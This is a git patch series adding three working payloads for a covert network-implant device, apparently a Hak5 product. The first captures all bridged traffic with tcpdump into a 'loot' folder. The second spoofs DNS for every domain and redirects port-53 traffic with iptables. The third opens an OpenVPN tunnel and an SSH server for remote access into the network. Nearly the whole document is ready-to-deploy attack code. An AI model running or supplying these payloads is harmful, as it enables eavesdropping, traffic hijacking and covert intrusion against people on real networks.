From 86639f17b7bb9b7ee28d43a0fee7e0dae51d66e1 Mon Sep 17 00:00:00 2001 From: cyrus104 Date: Thu, 9 Jul 2020 13:37:32 +0700 Subject: [PATCH 1/4] Added default payload with a few changes Default payload updated to enable transparent mode on error. --- payloads/switch1/payload.sh | 68 +++++++++++++++++++++++++++++++------ 1 file changed, 57 insertions(+), 11 deletions(-) diff --git a/payloads/switch1/payload.sh b/payloads/switch1/payload.sh index 25da1c3..e333b0a 100755 --- a/payloads/switch1/payload.sh +++ b/payloads/switch1/payload.sh @@ -1,12 +1,58 @@ #!/bin/bash -# -# Title: Default Payload -# Description: Sets the NETMODE to NAT, then sets the LED to ATTACK -# Author: Hak5 -# Version: 1.0 -# Category: default -# Target: Any -# Net Mode: NAT - -NETMODE NAT -LED ATTACK +# TCPDump payload v1.0 + +function monitor_space() { + while true + do + [[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && { + kill $1 + LED G SUCCESS + sync + break + } + sleep 5 + done +} + +function finish() { + # Kill TCPDump and sync filesystem + kill $1 + wait $1 + sync + + # Indicate successful shutdown + LED R SUCCESS + sleep 1 + + # Halt the system + LED OFF + halt +} + +function run() { + # Create loot directory + mkdir -p /mnt/loot/tcpdump &> /dev/null + + # Set networking to TRANSPARENT mode and wait five seconds + NETMODE TRANSPARENT + sleep 5 + + # Start tcpdump on the bridge interface + tcpdump -i br-lan -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null & + tpid=$! + + # Wait for button to be pressed (disable button LED) + NO_LED=true BUTTON + finish $tpid +} + + +# This payload will only run if we have USB storage +[[ ! -f /mnt/NO_MOUNT ]] && { + LED ATTACK + run & + monitor_space $! & +} || { + LED FAIL + NETMODE TRASPARENT +} From 14da80aa0d43d616acd392bf4163adff24cfa51f Mon Sep 17 00:00:00 2001 From: cyrus104 Date: Thu, 9 Jul 2020 13:38:14 +0700 Subject: [PATCH 2/4] Uploaded Default Switch 2 Payload --- payloads/switch2/payload.sh | 39 ++++++++++++++++++++++++++----------- payloads/switch2/spoofhost | 1 + 2 files changed, 29 insertions(+), 11 deletions(-) create mode 100644 payloads/switch2/spoofhost diff --git a/payloads/switch2/payload.sh b/payloads/switch2/payload.sh index 25da1c3..294bcbd 100755 --- a/payloads/switch2/payload.sh +++ b/payloads/switch2/payload.sh @@ -1,12 +1,29 @@ #!/bin/bash -# -# Title: Default Payload -# Description: Sets the NETMODE to NAT, then sets the LED to ATTACK -# Author: Hak5 -# Version: 1.0 -# Category: default -# Target: Any -# Net Mode: NAT - -NETMODE NAT -LED ATTACK +# DNSSpoof payload + + +function setup() { + # Show SETUP LED + LED SETUP + + # Set the network mode to NAT + NETMODE NAT + sleep 5 + + # Copy the spoofhost file to /tmp/dnsmasq.address + cp $(dirname ${BASH_SOURCE[0]})/spoofhost /tmp/dnsmasq.address &> /dev/null + + # Restart dnsmasq with the new configuration + /etc/init.d/dnsmasq restart +} + +function run() { + # Show ATTACK LED + LED ATTACK + + # Redirect all DNS traffic to ourselves + iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53 +} + +setup +run \ No newline at end of file diff --git a/payloads/switch2/spoofhost b/payloads/switch2/spoofhost new file mode 100644 index 0000000..6580081 --- /dev/null +++ b/payloads/switch2/spoofhost @@ -0,0 +1 @@ +address=/#/172.16.32.1 \ No newline at end of file From 93dd64b29250d5370caff14ac63e3d88a33659b6 Mon Sep 17 00:00:00 2001 From: cyrus104 Date: Thu, 9 Jul 2020 13:40:49 +0700 Subject: [PATCH 3/4] Uploaded Default Switch 3 Payload --- payloads/switch3/config.ovpn | 1 + payloads/switch3/payload.sh | 62 +++++++++++++++++++++++++++++------- 2 files changed, 52 insertions(+), 11 deletions(-) create mode 100644 payloads/switch3/config.ovpn diff --git a/payloads/switch3/config.ovpn b/payloads/switch3/config.ovpn new file mode 100644 index 0000000..30360f9 --- /dev/null +++ b/payloads/switch3/config.ovpn @@ -0,0 +1 @@ +Replace with valid .ovpn config. \ No newline at end of file diff --git a/payloads/switch3/payload.sh b/payloads/switch3/payload.sh index 25da1c3..913a92b 100755 --- a/payloads/switch3/payload.sh +++ b/payloads/switch3/payload.sh @@ -1,12 +1,52 @@ #!/bin/bash -# -# Title: Default Payload -# Description: Sets the NETMODE to NAT, then sets the LED to ATTACK -# Author: Hak5 -# Version: 1.0 -# Category: default -# Target: Any -# Net Mode: NAT - -NETMODE NAT -LED ATTACK +# OpenVPN payload + +# Set to 1 to allow clients to use the VPN +FOR_CLIENTS=0 + +DNS_SERVER="8.8.8.8" + +# Cheap hack to set the DNS server +function setdns() { + while true + do + [[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && { + echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf + } + sleep 5 + done +} + +function start() { + LED SETUP + + DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd) + + # Set NETMODE to BRIDGE and wait 3 seconds + # to ensure that things can settle + + [[ "$FOR_CLIENTS" == "1" ]] && { + /usr/bin/NETMODE VPN + } || { + /usr/bin/NETMODE BRIDGE + } + sleep 3 + + # Make OpenVPN use the local configuration + uci set openvpn.vpn.config="${DIR}/config.ovpn" + uci commit + + # Start the OpenVPN server in the background + /etc/init.d/openvpn start + + # Start SSH Server + /etc/init.d/sshd start & + + # Set DNS server + setdns & + + LED ATTACK +} + +# Start the payload +start & From 1ddc8980e1a003eff5f344173c1c77d1b9ed5d10 Mon Sep 17 00:00:00 2001 From: cyrus104 Date: Fri, 10 Jul 2020 15:01:56 +0700 Subject: [PATCH 4/4] corrected a typo --- payloads/switch1/payload.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/switch1/payload.sh b/payloads/switch1/payload.sh index e333b0a..40838f1 100755 --- a/payloads/switch1/payload.sh +++ b/payloads/switch1/payload.sh @@ -54,5 +54,5 @@ function run() { monitor_space $! & } || { LED FAIL - NETMODE TRASPARENT + NETMODE TRANSPARENT }